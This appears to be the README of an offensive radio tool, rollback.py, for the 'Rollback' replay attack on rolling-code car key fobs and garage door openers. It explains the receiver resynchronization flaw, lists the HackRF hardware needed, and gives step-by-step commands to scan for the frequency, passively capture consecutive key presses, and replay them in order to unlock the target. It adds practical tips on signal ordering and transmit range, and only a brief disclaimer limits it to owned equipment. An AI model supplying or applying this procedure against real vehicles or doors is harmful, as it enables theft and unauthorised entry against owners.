A demonstration of the Rollback attack against rolling code systems (KeeLoq, etc.) used in car key fobs and garage door openers at 315/433.92 MHz.
Unlike RollJam (which requires jamming), Rollback is purely passive capture followed by delayed sequential replay. No interference with the target during capture.
Step 1: SCAN hackrf_sweep finds the frequency (315 or 433.92 MHz)
Step 2: CAPTURE Record 3-5 consecutive key presses (passive, no jamming)
Each press is saved as a separate raw IQ file
Step 3: WAIT Owner uses the car/door normally, advancing the counter
(e.g., counter goes from #101 to #153)
Step 4: REPLAY Transmit the captured signals in exact original order:
Signal #101 → car ignores (old code)
Signal #102 → car notices a sequence forming
Signal #103 → ROLLBACK triggered — car resets to #103
Step 5: ACCESS The car/door's counter is now rolled back
Signal #103 is accepted as valid → door opens
Rolling code receivers have a resynchronization window: if they hear N consecutive valid codes in order (even if old), they assume the remote was reset and roll back their internal counter to match. This is a design flaw in KeeLoq and similar systems — the receiver prioritizes usability (re-pairing a reset remote) over security.
- HackRF One — captures (RX) and replays (TX) signals
- No Evil Crow, no Flipper, no jamming device needed
- Python 3, numpy
hackrf_sweep(for frequency scanning)hackrf_transfer(for IQ capture and replay)- Optional: URH (Universal Radio Hacker) for visual signal analysis
# Step 1: Find the frequency
python3 rollback.py scan --band 315
python3 rollback.py scan --band 433
# Step 2: Capture 3-5 consecutive key presses
python3 rollback.py capture --freq 315.07 --count 5
# Step 3: Wait (owner uses car normally)
# Step 4: Replay in order
python3 rollback.py replay --session latest
# Analyze captured signals
python3 rollback.py analyze --session latestrollback-attack/
├── rollback.py # Main tool (scan/capture/replay/analyze)
├── requirements.txt # Python dependencies
├── README.md # This file
└── captures/ # Stored capture sessions
└── session_YYYYMMDD_HHMMSS/
├── metadata.json # Frequency, sample rate, signal list
├── signal_001.iq # Raw IQ for first key press
├── signal_002.iq # Raw IQ for second key press
└── signal_003.iq # Raw IQ for third key press
- This is for educational/research purposes on equipment you own
- Rollback does NOT work on all rolling code systems — some have been patched
- The number of signals needed (3-5) depends on the receiver's resync window
- Signals must be captured consecutively (no missed presses between them)
- Replay must be in exact chronological order
- HackRF TX power is low (~10 dBm) — must be close to the receiver